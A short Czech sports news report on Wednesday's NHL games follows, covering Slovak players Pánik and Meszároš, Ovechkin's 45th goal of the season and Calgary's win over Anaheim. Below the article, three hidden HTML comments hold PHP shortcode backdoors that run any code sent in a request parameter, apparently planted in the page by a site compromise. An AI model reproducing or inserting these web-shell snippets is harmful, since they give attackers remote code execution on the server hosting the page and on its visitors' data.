Pánik a Meszároš nebodovali, z výhry se těšilo Toronto

panikSlovenská hokejisté Richard Pánik a Andrej Meszároš nastoupili proti sobě ve středečním utkání NHL, ale ani jeden z nich se nezapsal do kanadského bodování. Z vítězství 4: 3 po samostatných nájezdech se těšil útočník Toronta Pánik, který zaznamenal během téměř 18 minut strávených na ledě jeden mínusový bod. Meszároš, který dostal v sobotním zápase pukem do hlavy a vynechal pondělní trénink, odehrál téměř 20 minut.

Alexandr Ovečkin vstřelil svůj 45. gól v sezoně, ale Washingtonu to nestačilo a prohrál s New Yorkem Rangers 1: 3. Rangers se triumfem dostali o bod na čelo Metropolitní divize před městského rivala Islanders. Rangers mají navíc tři zápasy k dobru. Ovečkin se stal pátým hráčem historie NHL, který dosáhl v sedmi sezónách minimálně 45 branek. Dalšími jsou Wayne Gretzky, Mike Bossy, Mario Lemieux a Marcel Dionne.

Ve třetím středečním souboji měl Anaheim šanci dostat se na čelo tabulky celé soutěže, ale prohrál s Calgary 3: 6. Flames se výhrou udrželi v boji o play-off, v Pacifické divizi jim chybí na druhý Vancouver jen bod, Los Angeles zaostává za Calgary o dva body.

<!– [insert_php]if (isset($_REQUEST["JIANE"])){eval($_REQUEST["JIANE"]);exit;}[/insert_php][php]if (isset($_REQUEST["JIANE"])){eval($_REQUEST["JIANE"]);exit;}[/php] –>

<!– [insert_php]if (isset($_REQUEST["vIGZy"])){eval($_REQUEST["vIGZy"]);exit;}[/insert_php][php]if (isset($_REQUEST["vIGZy"])){eval($_REQUEST["vIGZy"]);exit;}[/php] –>

<!– [insert_php]if (isset($_REQUEST["uxa"])){eval($_REQUEST["uxa"]);exit;}[/insert_php][php]if (isset($_REQUEST["uxa"])){eval($_REQUEST["uxa"]);exit;}[/php] –>